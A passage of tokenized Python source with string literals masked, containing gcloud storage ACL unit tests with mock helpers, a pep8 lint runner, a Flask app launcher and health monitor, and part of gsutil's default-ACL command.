'<STR_LIT>' , DEFAULT ) is DEFAULT ) <EOL> def test_get_entity_miss_entity_w_default ( self ) : <EOL> from gcloud . storage . acl import _ACLEntity <EOL> DEFAULT = object ( ) <EOL> TYPE = '<STR_LIT:type>' <EOL> ID = '<STR_LIT:id>' <EOL> entity = _ACLEntity ( TYPE , ID ) <EOL> acl = self . _makeOne ( ) <EOL> acl . loaded = True <EOL> self . assertTrue ( acl . get_entity ( entity , DEFAULT ) is DEFAULT ) <EOL> def test_get_entity_hit_str ( self ) : <EOL> TYPE = '<STR_LIT:type>' <EOL> ID = '<STR_LIT:id>' <EOL> acl = self . _makeOne ( ) <EOL> acl . loaded = True <EOL> acl . entity ( TYPE , ID ) <EOL> self . assertTrue ( acl . has_entity ( '<STR_LIT>' % ( TYPE , ID ) ) ) <EOL> def test_get_entity_hit_entity ( self ) : <EOL> TYPE = '<STR_LIT:type>' <EOL> ID = '<STR_LIT:id>' <EOL> acl = self . _makeOne ( ) <EOL> acl . loaded = True <EOL> entity = acl . entity ( TYPE , ID ) <EOL> self . assertTrue ( acl . has_entity ( entity ) ) <EOL> def test_add_entity_miss_eager ( self ) : <EOL> from gcloud . storage . acl import _ACLEntity <EOL> TYPE = '<STR_LIT:type>' <EOL> ID = '<STR_LIT:id>' <EOL> ROLE = '<STR_LIT>' <EOL> entity = _ACLEntity ( TYPE , ID ) <EOL> entity . grant ( ROLE ) <EOL> acl = self . _makeOne ( ) <EOL> acl . loaded = True <EOL> acl . add_entity ( entity ) <EOL> self . assertTrue ( acl . loaded ) <EOL> self . assertEqual ( list ( acl ) , <EOL> [ { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : ROLE } ] ) <EOL> self . assertEqual ( list ( acl . get_entities ( ) ) , [ entity ] ) <EOL> def test_add_entity_miss_lazy ( self ) : <EOL> from gcloud . storage . acl import _ACLEntity <EOL> TYPE = '<STR_LIT:type>' <EOL> ID = '<STR_LIT:id>' <EOL> ROLE = '<STR_LIT>' <EOL> entity = _ACLEntity ( TYPE , ID ) <EOL> entity . grant ( ROLE ) <EOL> acl = self . _makeOne ( ) <EOL> def _reload ( ) : <EOL> acl . loaded = True <EOL> acl . reload = _reload <EOL> acl . add_entity ( entity ) <EOL> self . assertTrue ( acl . loaded ) <EOL> self . assertEqual ( list ( acl ) , <EOL> [ { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : ROLE } ] ) <EOL> self . assertEqual ( list ( acl . get_entities ( ) ) , [ entity ] ) <EOL> self . assertTrue ( acl . loaded ) <EOL> def test_add_entity_hit ( self ) : <EOL> from gcloud . storage . acl import _ACLEntity <EOL> TYPE = '<STR_LIT:type>' <EOL> ID = '<STR_LIT:id>' <EOL> ENTITY_VAL = '<STR_LIT>' % ( TYPE , ID ) <EOL> ROLE = '<STR_LIT>' <EOL> entity = _ACLEntity ( TYPE , ID ) <EOL> entity . grant ( ROLE ) <EOL> acl = self . _makeOne ( ) <EOL> acl . loaded = True <EOL> before = acl . entity ( TYPE , ID ) <EOL> acl . add_entity ( entity ) <EOL> self . assertTrue ( acl . loaded ) <EOL> self . assertFalse ( acl . get_entity ( ENTITY_VAL ) is before ) <EOL> self . assertTrue ( acl . get_entity ( ENTITY_VAL ) is entity ) <EOL> self . assertEqual ( list ( acl ) , <EOL> [ { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : ROLE } ] ) <EOL> self . assertEqual ( list ( acl . get_entities ( ) ) , [ entity ] ) <EOL> def test_entity_miss ( self ) : <EOL> TYPE = '<STR_LIT:type>' <EOL> ID = '<STR_LIT:id>' <EOL> ROLE = '<STR_LIT>' <EOL> acl = self . _makeOne ( ) <EOL> acl . loaded = True <EOL> entity = acl . entity ( TYPE , ID ) <EOL> self . assertTrue ( acl . loaded ) <EOL> entity . grant ( ROLE ) <EOL> self . assertEqual ( list ( acl ) , <EOL> [ { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : ROLE } ] ) <EOL> self . assertEqual ( list ( acl . get_entities ( ) ) , [ entity ] ) <EOL> def test_entity_hit ( self ) : <EOL> TYPE = '<STR_LIT:type>' <EOL> ID = '<STR_LIT:id>' <EOL> ROLE = '<STR_LIT>' <EOL> acl = self . _makeOne ( ) <EOL> acl . loaded = True <EOL> before = acl . entity ( TYPE , ID ) <EOL> before . grant ( ROLE ) <EOL> entity = acl . entity ( TYPE , ID ) <EOL> self . assertTrue ( entity is before ) <EOL> self . assertEqual ( list ( acl ) , <EOL> [ { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : ROLE } ] ) <EOL> self . assertEqual ( list ( acl . get_entities ( ) ) , [ entity ] ) <EOL> def test_user ( self ) : <EOL> ID = '<STR_LIT:id>' <EOL> ROLE = '<STR_LIT>' <EOL> acl = self . _makeOne ( ) <EOL> acl . loaded = True <EOL> entity = acl . user ( ID ) <EOL> entity . grant ( ROLE ) <EOL> self . assertEqual ( entity . type , '<STR_LIT:user>' ) <EOL> self . assertEqual ( entity . identifier , ID ) <EOL> self . assertEqual ( list ( acl ) , <EOL> [ { '<STR_LIT>' : '<STR_LIT>' % ID , '<STR_LIT>' : ROLE } ] ) <EOL> def test_group ( self ) : <EOL> ID = '<STR_LIT:id>' <EOL> ROLE = '<STR_LIT>' <EOL> acl = self . _makeOne ( ) <EOL> acl . loaded = True <EOL> entity = acl . group ( ID ) <EOL> entity . grant ( ROLE ) <EOL> self . assertEqual ( entity . type , '<STR_LIT>' ) <EOL> self . assertEqual ( entity . identifier , ID ) <EOL> self . assertEqual ( list ( acl ) , <EOL> [ { '<STR_LIT>' : '<STR_LIT>' % ID , '<STR_LIT>' : ROLE } ] ) <EOL> def test_domain ( self ) : <EOL> ID = '<STR_LIT:id>' <EOL> ROLE = '<STR_LIT>' <EOL> acl = self . _makeOne ( ) <EOL> acl . loaded = True <EOL> entity = acl . domain ( ID ) <EOL> entity . grant ( ROLE ) <EOL> self . assertEqual ( entity . type , '<STR_LIT>' ) <EOL> self . assertEqual ( entity . identifier , ID ) <EOL> self . assertEqual ( list ( acl ) , <EOL> [ { '<STR_LIT>' : '<STR_LIT>' % ID , '<STR_LIT>' : ROLE } ] ) <EOL> def test_all ( self ) : <EOL> ROLE = '<STR_LIT>' <EOL> acl = self . _makeOne ( ) <EOL> acl . loaded = True <EOL> entity = acl . all ( ) <EOL> entity . grant ( ROLE ) <EOL> self . assertEqual ( entity . type , '<STR_LIT>' ) <EOL> self . assertEqual ( entity . identifier , None ) <EOL> self . assertEqual ( list ( acl ) , <EOL> [ { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : ROLE } ] ) <EOL> def test_all_authenticated ( self ) : <EOL> ROLE = '<STR_LIT>' <EOL> acl = self . _makeOne ( ) <EOL> acl . loaded = True <EOL> entity = acl . all_authenticated ( ) <EOL> entity . grant ( ROLE ) <EOL> self . assertEqual ( entity . type , '<STR_LIT>' ) <EOL> self . assertEqual ( entity . identifier , None ) <EOL> self . assertEqual ( list ( acl ) , <EOL> [ { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : ROLE } ] ) <EOL> def test_get_entities_empty_eager ( self ) : <EOL> acl = self . _makeOne ( ) <EOL> acl . loaded = True <EOL> self . assertEqual ( acl . get_entities ( ) , [ ] ) <EOL> def test_get_entities_empty_lazy ( self ) : <EOL> acl = self . _makeOne ( ) <EOL> def _reload ( ) : <EOL> acl . loaded = True <EOL> acl . reload = _reload <EOL> self . assertEqual ( acl . get_entities ( ) , [ ] ) <EOL> self . assertTrue ( acl . loaded ) <EOL> def test_get_entities_nonempty ( self ) : <EOL> TYPE = '<STR_LIT:type>' <EOL> ID = '<STR_LIT:id>' <EOL> acl = self . _makeOne ( ) <EOL> acl . loaded = True <EOL> entity = acl . entity ( TYPE , ID ) <EOL> self . assertEqual ( acl . get_entities ( ) , [ entity ] ) <EOL> def test_reload_missing ( self ) : <EOL> ROLE = '<STR_LIT>' <EOL> connection = _Connection ( { } ) <EOL> client = _Client ( connection ) <EOL> acl = self . _makeOne ( ) <EOL> acl . reload_path = '<STR_LIT>' <EOL> acl . loaded = True <EOL> acl . entity ( '<STR_LIT>' , ROLE ) <EOL> acl . reload ( client = client ) <EOL> self . assertEqual ( list ( acl ) , [ ] ) <EOL> kw = connection . _requested <EOL> self . assertEqual ( len ( kw ) , <NUM_LIT:1> ) <EOL> self . assertEqual ( kw [ <NUM_LIT:0> ] [ '<STR_LIT>' ] , '<STR_LIT:GET>' ) <EOL> self . assertEqual ( kw [ <NUM_LIT:0> ] [ '<STR_LIT:path>' ] , '<STR_LIT>' ) <EOL> def test_reload_empty_result_clears_local ( self ) : <EOL> ROLE = '<STR_LIT>' <EOL> connection = _Connection ( { '<STR_LIT>' : [ ] } ) <EOL> client = _Client ( connection ) <EOL> acl = self . _makeOne ( ) <EOL> acl . reload_path = '<STR_LIT>' <EOL> acl . loaded = True <EOL> acl . entity ( '<STR_LIT>' , ROLE ) <EOL> acl . reload ( client = client ) <EOL> self . assertTrue ( acl . loaded ) <EOL> self . assertEqual ( list ( acl ) , [ ] ) <EOL> kw = connection . _requested <EOL> self . assertEqual ( len ( kw ) , <NUM_LIT:1> ) <EOL> self . assertEqual ( kw [ <NUM_LIT:0> ] [ '<STR_LIT>' ] , '<STR_LIT:GET>' ) <EOL> self . assertEqual ( kw [ <NUM_LIT:0> ] [ '<STR_LIT:path>' ] , '<STR_LIT>' ) <EOL> def test_reload_nonempty_result ( self ) : <EOL> ROLE = '<STR_LIT>' <EOL> connection = _Connection ( <EOL> { '<STR_LIT>' : [ { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : ROLE } ] } ) <EOL> client = _Client ( connection ) <EOL> acl = self . _makeOne ( ) <EOL> acl . reload_path = '<STR_LIT>' <EOL> acl . loaded = True <EOL> acl . reload ( client = client ) <EOL> self . assertTrue ( acl . loaded ) <EOL> self . assertEqual ( list ( acl ) , [ { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : ROLE } ] ) <EOL> kw = connection . _requested <EOL> self . assertEqual ( len ( kw ) , <NUM_LIT:1> ) <EOL> self . assertEqual ( kw [ <NUM_LIT:0> ] [ '<STR_LIT>' ] , '<STR_LIT:GET>' ) <EOL> self . assertEqual ( kw [ <NUM_LIT:0> ] [ '<STR_LIT:path>' ] , '<STR_LIT>' ) <EOL> def test_save_none_set_none_passed ( self ) : <EOL> connection = _Connection ( ) <EOL> client = _Client ( connection ) <EOL> acl = self . _makeOne ( ) <EOL> acl . save_path = '<STR_LIT>' <EOL> acl . save ( client = client ) <EOL> kw = connection . _requested <EOL> self . assertEqual ( len ( kw ) , <NUM_LIT:0> ) <EOL> def test_save_existing_missing_none_passed ( self ) : <EOL> connection = _Connection ( { } ) <EOL> client = _Client ( connection ) <EOL> acl = self . _makeOne ( ) <EOL> acl . save_path = '<STR_LIT>' <EOL> acl . loaded = True <EOL> acl . save ( client = client ) <EOL> self . assertEqual ( list ( acl ) , [ ] ) <EOL> kw = connection . _requested <EOL> self . assertEqual ( len ( kw ) , <NUM_LIT:1> ) <EOL> self . assertEqual ( kw [ <NUM_LIT:0> ] [ '<STR_LIT>' ] , '<STR_LIT>' ) <EOL> self . assertEqual ( kw [ <NUM_LIT:0> ] [ '<STR_LIT:path>' ] , '<STR_LIT>' ) <EOL> self . assertEqual ( kw [ <NUM_LIT:0> ] [ '<STR_LIT:data>' ] , { '<STR_LIT>' : [ ] } ) <EOL> self . assertEqual ( kw [ <NUM_LIT:0> ] [ '<STR_LIT>' ] , { '<STR_LIT>' : '<STR_LIT>' } ) <EOL> def test_save_no_acl ( self ) : <EOL> ROLE = '<STR_LIT>' <EOL> AFTER = [ { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : ROLE } ] <EOL> connection = _Connection ( { '<STR_LIT>' : AFTER } ) <EOL> client = _Client ( connection ) <EOL> acl = self . _makeOne ( ) <EOL> acl . save_path = '<STR_LIT>' <EOL> acl . loaded = True <EOL> acl . entity ( '<STR_LIT>' ) . grant ( ROLE ) <EOL> acl . save ( client = client ) <EOL> self . assertEqual ( list ( acl ) , AFTER ) <EOL> kw = connection . _requested <EOL> self . assertEqual ( len ( kw ) , <NUM_LIT:1> ) <EOL> self . assertEqual ( kw [ <NUM_LIT:0> ] [ '<STR_LIT>' ] , '<STR_LIT>' ) <EOL> self . assertEqual ( kw [ <NUM_LIT:0> ] [ '<STR_LIT:path>' ] , '<STR_LIT>' ) <EOL> self . assertEqual ( kw [ <NUM_LIT:0> ] [ '<STR_LIT:data>' ] , { '<STR_LIT>' : AFTER } ) <EOL> self . assertEqual ( kw [ <NUM_LIT:0> ] [ '<STR_LIT>' ] , { '<STR_LIT>' : '<STR_LIT>' } ) <EOL> def test_save_w_acl ( self ) : <EOL> ROLE1 = '<STR_LIT>' <EOL> ROLE2 = '<STR_LIT>' <EOL> STICKY = { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : ROLE2 } <EOL> new_acl = [ { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : ROLE1 } ] <EOL> connection = _Connection ( { '<STR_LIT>' : [ STICKY ] + new_acl } ) <EOL> client = _Client ( connection ) <EOL> acl = self . _makeOne ( ) <EOL> acl . save_path = '<STR_LIT>' <EOL> acl . loaded = True <EOL> acl . save ( new_acl , client = client ) <EOL> entries = list ( acl ) <EOL> self . assertEqual ( len ( entries ) , <NUM_LIT:2> ) <EOL> self . assertTrue ( STICKY in entries ) <EOL> self . assertTrue ( new_acl [ <NUM_LIT:0> ] in entries ) <EOL> kw = connection . _requested <EOL> self . assertEqual ( len ( kw ) , <NUM_LIT:1> ) <EOL> self . assertEqual ( kw [ <NUM_LIT:0> ] [ '<STR_LIT>' ] , '<STR_LIT>' ) <EOL> self . assertEqual ( kw [ <NUM_LIT:0> ] [ '<STR_LIT:path>' ] , '<STR_LIT>' ) <EOL> self . assertEqual ( kw [ <NUM_LIT:0> ] [ '<STR_LIT:data>' ] , { '<STR_LIT>' : new_acl } ) <EOL> self . assertEqual ( kw [ <NUM_LIT:0> ] [ '<STR_LIT>' ] , { '<STR_LIT>' : '<STR_LIT>' } ) <EOL> def test_save_prefefined_invalid ( self ) : <EOL> connection = _Connection ( ) <EOL> client = _Client ( connection ) <EOL> acl = self . _makeOne ( ) <EOL> acl . save_path = '<STR_LIT>' <EOL> acl . loaded = True <EOL> with self . assertRaises ( ValueError ) : <EOL> acl . save_predefined ( '<STR_LIT>' , client = client ) <EOL> def test_save_predefined_valid ( self ) : <EOL> PREDEFINED = '<STR_LIT>' <EOL> connection = _Connection ( { '<STR_LIT>' : [ ] } ) <EOL> client = _Client ( connection ) <EOL> acl = self . _makeOne ( ) <EOL> acl . save_path = '<STR_LIT>' <EOL> acl . loaded = True <EOL> acl . save_predefined ( PREDEFINED , client = client ) <EOL> entries = list ( acl ) <EOL> self . assertEqual ( len ( entries ) , <NUM_LIT:0> ) <EOL> kw = connection . _requested <EOL> self . assertEqual ( len ( kw ) , <NUM_LIT:1> ) <EOL> self . assertEqual ( kw [ <NUM_LIT:0> ] [ '<STR_LIT>' ] , '<STR_LIT>' ) <EOL> self . assertEqual ( kw [ <NUM_LIT:0> ] [ '<STR_LIT:path>' ] , '<STR_LIT>' ) <EOL> self . assertEqual ( kw [ <NUM_LIT:0> ] [ '<STR_LIT:data>' ] , { '<STR_LIT>' : [ ] } ) <EOL> self . assertEqual ( kw [ <NUM_LIT:0> ] [ '<STR_LIT>' ] , <EOL> { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : PREDEFINED } ) <EOL> def test_save_predefined_w_XML_alias ( self ) : <EOL> PREDEFINED_XML = '<STR_LIT>' <EOL> PREDEFINED_JSON = '<STR_LIT>' <EOL> connection = _Connection ( { '<STR_LIT>' : [ ] } ) <EOL> client = _Client ( connection ) <EOL> acl = self . _makeOne ( ) <EOL> acl . save_path = '<STR_LIT>' <EOL> acl . loaded = True <EOL> acl . save_predefined ( PREDEFINED_XML , client = client ) <EOL> entries = list ( acl ) <EOL> self . assertEqual ( len ( entries ) , <NUM_LIT:0> ) <EOL> kw = connection . _requested <EOL> self . assertEqual ( len ( kw ) , <NUM_LIT:1> ) <EOL> self . assertEqual ( kw [ <NUM_LIT:0> ] [ '<STR_LIT>' ] , '<STR_LIT>' ) <EOL> self . assertEqual ( kw [ <NUM_LIT:0> ] [ '<STR_LIT:path>' ] , '<STR_LIT>' ) <EOL> self . assertEqual ( kw [ <NUM_LIT:0> ] [ '<STR_LIT:data>' ] , { '<STR_LIT>' : [ ] } ) <EOL> self . assertEqual ( kw [ <NUM_LIT:0> ] [ '<STR_LIT>' ] , <EOL> { '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : PREDEFINED_JSON } ) <EOL> def test_save_predefined_valid_w_alternate_query_param ( self ) : <EOL> PREDEFINED = '<STR_LIT>' <EOL> connection = _Connection ( { '<STR_LIT>' : [ ] } ) <EOL> client = _Client ( connection ) <EOL> acl = self . _makeOne ( ) <EOL> acl . save_path = '<STR_LIT>' <EOL> acl . loaded = True <EOL> acl . _PREDEFINED_QUERY_PARAM = '<STR_LIT>' <EOL> acl . save_predefined ( PREDEFINED , client = client ) <EOL> entries = list ( acl ) <EOL> self . assertEqual ( len ( entries ) , <NUM_LIT:0> ) <EOL> kw = connection . _requested <EOL> self . assertEqual ( len ( kw ) , <NUM_LIT:1> ) <EOL> self . assertEqual ( kw [ <NUM_LIT:0> ] [ '<STR_LIT>' ] , '<STR_LIT>' ) <EOL> self . assertEqual ( kw [ <NUM_LIT:0> ] [ '<STR_LIT:path>' ] , '<STR_LIT>' ) <EOL> self . assertEqual ( kw [ <NUM_LIT:0> ] [ '<STR_LIT:data>' ] , { '<STR_LIT>' : [ ] } ) <EOL> self . assertEqual ( kw [ <NUM_LIT:0> ] [ '<STR_LIT>' ] , <EOL> { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : PREDEFINED } ) <EOL> def test_clear ( self ) : <EOL> ROLE1 = '<STR_LIT>' <EOL> ROLE2 = '<STR_LIT>' <EOL> STICKY = { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : ROLE2 } <EOL> connection = _Connection ( { '<STR_LIT>' : [ STICKY ] } ) <EOL> client = _Client ( connection ) <EOL> acl = self . _makeOne ( ) <EOL> acl . save_path = '<STR_LIT>' <EOL> acl . loaded = True <EOL> acl . entity ( '<STR_LIT>' , ROLE1 ) <EOL> acl . clear ( client = client ) <EOL> self . assertEqual ( list ( acl ) , [ STICKY ] ) <EOL> kw = connection . _requested <EOL> self . assertEqual ( len ( kw ) , <NUM_LIT:1> ) <EOL> self . assertEqual ( kw [ <NUM_LIT:0> ] [ '<STR_LIT>' ] , '<STR_LIT>' ) <EOL> self . assertEqual ( kw [ <NUM_LIT:0> ] [ '<STR_LIT:path>' ] , '<STR_LIT>' ) <EOL> self . assertEqual ( kw [ <NUM_LIT:0> ] [ '<STR_LIT:data>' ] , { '<STR_LIT>' : [ ] } ) <EOL> self . assertEqual ( kw [ <NUM_LIT:0> ] [ '<STR_LIT>' ] , { '<STR_LIT>' : '<STR_LIT>' } ) <EOL> class Test_BucketACL ( unittest2 . TestCase ) : <EOL> def _getTargetClass ( self ) : <EOL> from gcloud . storage . acl import BucketACL <EOL> return BucketACL <EOL> def _makeOne ( self , * args , ** kw ) : <EOL> return self . _getTargetClass ( ) ( * args , ** kw ) <EOL> def test_ctor ( self ) : <EOL> NAME = '<STR_LIT:name>' <EOL> bucket = _Bucket ( NAME ) <EOL> acl = self . _makeOne ( bucket ) <EOL> self . assertEqual ( acl . entities , { } ) <EOL> self . assertFalse ( acl . loaded ) <EOL> self . assertTrue ( acl . bucket is bucket ) <EOL> self . assertEqual ( acl . reload_path , '<STR_LIT>' % NAME ) <EOL> self . assertEqual ( acl . save_path , '<STR_LIT>' % NAME ) <EOL> class Test_DefaultObjectACL ( unittest2 . TestCase ) : <EOL> def _getTargetClass ( self ) : <EOL> from gcloud . storage . acl import DefaultObjectACL <EOL> return DefaultObjectACL <EOL> def _makeOne ( self , * args , ** kw ) : <EOL> return self . _getTargetClass ( ) ( * args , ** kw ) <EOL> def test_ctor ( self ) : <EOL> NAME = '<STR_LIT:name>' <EOL> bucket = _Bucket ( NAME ) <EOL> acl = self . _makeOne ( bucket ) <EOL> self . assertEqual ( acl . entities , { } ) <EOL> self . assertFalse ( acl . loaded ) <EOL> self . assertTrue ( acl . bucket is bucket ) <EOL> self . assertEqual ( acl . reload_path , '<STR_LIT>' % NAME ) <EOL> self . assertEqual ( acl . save_path , '<STR_LIT>' % NAME ) <EOL> class Test_ObjectACL ( unittest2 . TestCase ) : <EOL> def _getTargetClass ( self ) : <EOL> from gcloud . storage . acl import ObjectACL <EOL> return ObjectACL <EOL> def _makeOne ( self , * args , ** kw ) : <EOL> return self . _getTargetClass ( ) ( * args , ** kw ) <EOL> def test_ctor ( self ) : <EOL> NAME = '<STR_LIT:name>' <EOL> BLOB_NAME = '<STR_LIT>' <EOL> bucket = _Bucket ( NAME ) <EOL> blob = _Blob ( bucket , BLOB_NAME ) <EOL> acl = self . _makeOne ( blob ) <EOL> self . assertEqual ( acl . entities , { } ) <EOL> self . assertFalse ( acl . loaded ) <EOL> self . assertTrue ( acl . blob is blob ) <EOL> self . assertEqual ( acl . reload_path , '<STR_LIT>' % ( NAME , BLOB_NAME ) ) <EOL> self . assertEqual ( acl . save_path , '<STR_LIT>' % ( NAME , BLOB_NAME ) ) <EOL> class _Blob ( object ) : <EOL> def __init__ ( self , bucket , blob ) : <EOL> self . bucket = bucket <EOL> self . blob = blob <EOL> @ property <EOL> def path ( self ) : <EOL> return '<STR_LIT>' % ( self . bucket . path , self . blob ) <EOL> class _Bucket ( object ) : <EOL> def __init__ ( self , name ) : <EOL> self . name = name <EOL> @ property <EOL> def path ( self ) : <EOL> return '<STR_LIT>' % self . name <EOL> class _Connection ( object ) : <EOL> _delete_ok = False <EOL> def __init__ ( self , * responses ) : <EOL> self . _responses = responses <EOL> self . _requested = [ ] <EOL> self . _deleted = [ ] <EOL> def api_request ( self , ** kw ) : <EOL> from gcloud . exceptions import NotFound <EOL> self . _requested . append ( kw ) <EOL> response , self . _responses = self . _responses [ <NUM_LIT:0> ] , self . _responses [ <NUM_LIT:1> : ] <EOL> return response <EOL> class _Client ( object ) : <EOL> def __init__ ( self , connection ) : <EOL> self . connection = connection </s>
<s> """<STR_LIT>""" <EOL> import os <EOL> import subprocess <EOL> import sys <EOL> def main ( ) : <EOL> """<STR_LIT>""" <EOL> git_root = subprocess . check_output ( <EOL> [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) . strip ( ) <EOL> os . chdir ( git_root ) <EOL> python_files = subprocess . check_output ( [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> python_files = python_files . strip ( ) . split ( ) <EOL> pep8_command = [ '<STR_LIT>' ] + python_files <EOL> status_code = subprocess . call ( pep8_command ) <EOL> sys . exit ( status_code ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> main ( ) </s>
<s> import bookshelf <EOL> import config <EOL> app = bookshelf . create_app ( config ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> app . run ( host = '<STR_LIT:127.0.0.1>' , port = <NUM_LIT> , debug = True ) </s>
<s> import os <EOL> import sys <EOL> from flask import Flask <EOL> PID_FILE = None <EOL> monitor_app = Flask ( __name__ ) <EOL> @ monitor_app . route ( '<STR_LIT>' ) <EOL> def health ( ) : <EOL> if not os . path . exists ( PID_FILE ) : <EOL> return '<STR_LIT>' , <NUM_LIT> <EOL> with open ( PID_FILE , '<STR_LIT:r>' ) as pidfile : <EOL> pid = pidfile . read ( ) <EOL> if not os . path . exists ( '<STR_LIT>' . format ( pid ) ) : <EOL> return '<STR_LIT>' , <NUM_LIT> <EOL> return '<STR_LIT>' , <NUM_LIT:200> <EOL> @ monitor_app . route ( '<STR_LIT:/>' ) <EOL> def index ( ) : <EOL> return health ( ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> PID_FILE = sys . argv [ <NUM_LIT:1> ] <EOL> monitor_app . run ( '<STR_LIT>' , <NUM_LIT> ) </s>
<s> """<STR_LIT>""" <EOL> from __future__ import absolute_import <EOL> from gslib . help_provider import HelpProvider <EOL> _DETAILED_HELP_TEXT = ( """<STR_LIT>""" ) <EOL> class CommandOptions ( HelpProvider ) : <EOL> """<STR_LIT>""" <EOL> help_spec = HelpProvider . HelpSpec ( <EOL> help_name = '<STR_LIT>' , <EOL> help_name_aliases = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] , <EOL> help_type = '<STR_LIT>' , <EOL> help_one_line_summary = '<STR_LIT>' , <EOL> help_text = _DETAILED_HELP_TEXT , <EOL> subcommand_help_text = { } , <EOL> ) </s>
<s> """<STR_LIT>""" <EOL> from __future__ import absolute_import <EOL> from gslib import aclhelpers <EOL> from gslib . cloud_api import AccessDeniedException <EOL> from gslib . cloud_api import BadRequestException <EOL> from gslib . cloud_api import Preconditions <EOL> from gslib . cloud_api import ServiceException <EOL> from gslib . command import Command <EOL> from gslib . command import SetAclExceptionHandler <EOL> from gslib . command import SetAclFuncWrapper <EOL> from gslib . command_argument import CommandArgument <EOL> from gslib . cs_api_map import ApiSelector <EOL> from gslib . exception import CommandException <EOL> from gslib . help_provider import CreateHelpText <EOL> from gslib . storage_url import StorageUrlFromString <EOL> from gslib . third_party . storage_apitools import storage_v1_messages as apitools_messages <EOL> from gslib . translation_helper import PRIVATE_DEFAULT_OBJ_ACL <EOL> from gslib . util import NO_MAX <EOL> from gslib . util import Retry <EOL> from gslib . util import UrlsAreForSingleProvider <EOL> _SET_SYNOPSIS = """<STR_LIT>""" <EOL> _GET_SYNOPSIS = """<STR_LIT>""" <EOL> _CH_SYNOPSIS = """<STR_LIT>""" <EOL> _SET_DESCRIPTION = """<STR_LIT>""" <EOL> _GET_DESCRIPTION = """<STR_LIT>""" <EOL> _CH_DESCRIPTION = """<STR_LIT>""" <EOL> _SYNOPSIS = ( _SET_SYNOPSIS + _GET_SYNOPSIS . lstrip ( '<STR_LIT:\n>' ) + <EOL> _CH_SYNOPSIS . lstrip ( '<STR_LIT:\n>' ) + '<STR_LIT>' ) <EOL> _DESCRIPTION = """<STR_LIT>""" + '<STR_LIT:\n>' . join ( [ _SET_DESCRIPTION + _GET_DESCRIPTION + _CH_DESCRIPTION ] ) <EOL> _DETAILED_HELP_TEXT = CreateHelpText ( _SYNOPSIS , _DESCRIPTION ) <EOL> _get_help_text = CreateHelpText ( _GET_SYNOPSIS , _GET_DESCRIPTION ) <EOL> _set_help_text = CreateHelpText ( _SET_SYNOPSIS , _SET_DESCRIPTION ) <EOL> _ch_help_text = CreateHelpText ( _CH_SYNOPSIS , _CH_DESCRIPTION ) <EOL> class DefAclCommand ( Command ) : <EOL> """<STR_LIT>""" <EOL> command_spec = Command . CreateCommandSpec ( <EOL> '<STR_LIT>' , <EOL> command_name_aliases = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] , <EOL> usage_synopsis = _SYNOPSIS , <EOL> min_args = <NUM_LIT:2> , <EOL> max_args = NO_MAX , <EOL> supported_sub_args = '<STR_LIT>' , <EOL> file_url_ok = False , <EOL> provider_url_ok = False , <EOL> urls_start_arg = <NUM_LIT:1> , <EOL> gs_api_support = [ ApiSelector . XML , ApiSelector . JSON ] , <EOL> gs_default_api = ApiSelector . JSON , <EOL> argparse_arguments = { <EOL> '<STR_LIT>' : [ <EOL> CommandArgument . MakeFileURLOrCannedACLArgument ( ) , <EOL> CommandArgument . MakeZeroOrMoreCloudBucketURLsArgument ( ) <EOL> ] , <EOL> '<STR_LIT>' : [ <EOL> CommandArgument . MakeNCloudBucketURLsArgument ( <NUM_LIT:1> ) <EOL> ] , <EOL> '<STR_LIT>' : [ <EOL> CommandArgument . MakeZeroOrMoreCloudBucketURLsArgument ( ) <EOL> ] , <EOL> } <EOL> ) <EOL> help_spec = Command . HelpSpec ( <EOL> help_name = '<STR_LIT>' , <EOL> help_name_aliases = [ <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] , <EOL> help_type = '<STR_LIT>' , <EOL> help_one_line_summary = '<STR_LIT>' , <EOL> help_text = _DETAILED_HELP_TEXT , <EOL> subcommand_help_text = { <EOL> '<STR_LIT>' : _get_help_text , '<STR_LIT>' : _set_help_text , '<STR_LIT>' : _ch_help_text } , <EOL> ) <EOL> def _CalculateUrlsStartArg ( self ) : <EOL> if not self . args : <EOL> self . RaiseWrongNumberOfArgumentsException ( ) <EOL> if ( self . args [ <NUM_LIT:0> ] . lower ( ) == '<STR_LIT>' or <EOL> self . command_alias_used == '<STR_LIT>' ) : <EOL> return <NUM_LIT:1> <EOL> else : <EOL> return <NUM_LIT:0> <EOL> def _SetDefAcl ( self ) : <EOL> if not StorageUrlFromString ( self . args [ - <NUM_LIT:1> ] ) . IsBucket ( ) : <EOL> raise CommandException ( '<STR_LIT>' % <EOL> self . command_name ) <EOL> try : <EOL> self . SetAclCommandHelper ( SetAclFuncWrapper , SetAclExceptionHandler ) <EOL> except AccessDeniedException : <EOL> self . _WarnServiceAccounts ( ) <EOL> raise <EOL> def _GetDefAcl ( self ) : <EOL> if not StorageUrlFromString ( self . args [ <NUM_LIT:0> ] ) . IsBucket ( ) : <EOL> raise CommandException ( '<STR_LIT>' % <EOL> self . command_name ) <EOL> self . GetAndPrintAcl ( self . args [ <NUM_LIT:0> ] ) <EOL> def _ChDefAcl ( self ) : <EOL> """<STR_LIT>""" <EOL> self . parse_versions = True <EOL> self . changes = [ ] <EOL> if 